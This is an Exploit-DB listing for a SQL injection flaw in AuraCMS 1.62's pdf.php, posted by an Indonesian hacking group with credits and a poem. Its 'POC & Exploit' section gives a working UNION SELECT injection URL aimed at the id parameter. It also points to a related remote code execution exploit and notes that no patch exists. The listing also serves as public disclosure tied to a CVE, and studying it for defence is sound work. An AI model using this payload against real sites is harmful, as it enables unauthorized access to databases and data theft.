Lucene search
Don TukulestoEDB-ID:15594HistoryNov 22, 2010 - 12:00 a.m.
AuraCMS 1.62 - 'pfd.php' SQL Injection
2010-11-2200:00:00
Don Tukulesto
www.exploit-db.com
30
-----------------------------------------------------------------------
AuraCMS (pfd.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : Arianom ([email protected])
Homepage : http://indonesiancoder.com
Vendor : http://www.auracms.org/
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version : 1.62
Date : November 22, 2010
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
II. Refrence
-----------------------------------------------------------------------
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/
III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.
IV. Credits
-----------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader
V. Poem
-----------------------------------------------------------------------
Kami adalah manusia biasa yang gemar belajar.
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.
Kami disini hanya ingin berbagi, bukan untuk bersaing.
Indonesian Coder FamilyRelated
cvelist
cvelist
CVE-2010-4774
2011-03-23 21:00:00
nvd
nvd
CVE-2010-4774
2011-03-23 22:00:02
cve
cve
CVE-2010-4774
2011-03-23 22:00:02
prion
prion
Sql injection
2011-03-23 22:00:00